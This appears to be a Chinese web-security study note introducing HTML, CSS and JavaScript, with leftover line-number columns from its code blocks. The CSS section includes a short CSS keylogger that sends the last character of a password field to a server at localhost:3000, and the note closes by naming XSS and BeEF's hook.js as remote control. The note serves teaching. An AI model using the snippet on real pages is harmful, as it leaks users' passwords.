03.front end.md
goer ... 2022-01-21 小于 1 分钟
# 安全
[toc]
# 前端
页面能看到的东西 一定先自学
# Html
HTML:(Hyper Text Markup Language)超文本标记语言
<!DOCTYPE html>
<html lang="en">
<head>
<title>web</title>
</head>
<body>
<h3>hello web</h3>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
纯html(基本是没有漏洞的) 光着身体的孩子
# Css
CSS:(Cascading Style Sheets) 层叠样式表
<style>
*{
margin:0;
padding:0;
}
h3{
font-size:30px;
}
</style>
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
纯css(漏洞很少) 装饰打扮人
/* 能看懂下面css代码么 */
input[type="password"][value$="0"] { background-image: url("http://localhost:3000/0"); }
input[type="password"][value$="1"] { background-image: url("http://localhost:3000/1"); }
input[type="password"][value$="2"] { background-image: url("http://localhost:3000/2"); }
1
2
3
4
2
3
4
# Javascript
Javascript
: 客户端脚本语言,让前端动起来 一定要学
// script标签包起来
<script>
alert(11);
</script>
1
2
3
4
2
3
4
- 纯javascript 漏洞很多很多 让人动起来
- xss
beef -> js远控木马 引入 hook.js 就会被控